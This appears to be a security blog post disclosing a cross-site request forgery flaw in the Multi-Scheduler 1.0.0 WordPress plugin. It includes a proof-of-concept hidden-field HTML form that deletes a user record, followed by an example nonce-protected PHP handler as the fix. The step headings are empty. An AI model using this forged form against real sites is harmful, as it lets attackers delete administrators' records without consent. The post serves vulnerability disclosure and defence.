
Exploit WordPress Plugin Multi-Scheduler 1.0.0 – CSRF (Delete User) (PoC)

Vulnerability Details:

The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, which allows records (users) to be deleted when an ID is known.

  • Exploit Author: UnD3sc0n0c1d0
  • Vendor Homepage: https://www.bdtask.com/
  • Category: Web Application
  • Version: 1.0.0
  • Download – https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip

Full Proof of Concept (PoC)

Step -1

Step -2

Step -3

Step -4

<form action="http://192.168.0.104:8081/wp-admin/admin.php?page=msbdt_professional" method="POST">
  <input type="hidden" name="pro_delete_id" value="1" />
  <input type="hidden" name="professional_delete" value="Delete" />
  <input type="submit" value="Submit request" />
</form>

Step -5

Step -6

BOOM 🙂 !! User will be deleted.
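
On the defensive side, the forged form above succeeds because the request carries nothing the site can tie to an intentional click by the logged-in admin. The sketch below is an added example, not the plugin's or the author's code: it shows a WordPress delete handler for the same two POST fields that checks capability and a nonce first. The function names, nonce action string, capability and table name are assumptions.

```php
<?php
/**
 * Added example (not the plugin's code): nonce-protected delete for the
 * msbdt_professional admin page. All example_* names, the capability and
 * the table name are assumptions made for illustration.
 */

// Render the delete form with a nonce bound to the user, action and record.
function example_msbdt_delete_form( $id ) {
    $id = absint( $id );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=msbdt_professional' ) ); ?>">
        <?php wp_nonce_field( 'example_msbdt_delete_' . $id, 'example_msbdt_nonce' ); ?>
        <input type="hidden" name="pro_delete_id" value="<?php echo esc_attr( $id ); ?>" />
        <input type="submit" name="professional_delete" value="Delete" />
    </form>
    <?php
}

// Handle the POST: verify capability and nonce before touching the database.
function example_msbdt_handle_delete() {
    if ( ! isset( $_POST['professional_delete'], $_POST['pro_delete_id'] ) ) {
        return; // Not a delete request.
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    $id = absint( wp_unslash( $_POST['pro_delete_id'] ) );

    // Stops the request with a 403 page when the nonce is missing or invalid.
    // A cross-site form cannot read the nonce, so the forged POST ends here.
    check_admin_referer( 'example_msbdt_delete_' . $id, 'example_msbdt_nonce' );

    global $wpdb;
    // Placeholder table name; the plugin's real table is not shown on the page.
    $wpdb->delete(
        $wpdb->prefix . 'example_professionals',
        array( 'id' => $id ),
        array( '%d' )
    );
}
add_action( 'admin_init', 'example_msbdt_handle_delete' );
```

Because the nonce action includes the record ID, a token issued for one record cannot be replayed against another.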

About the Author
Virat Sharma: Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be contacted on LinkedIn.
Shubham Goyal

A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.

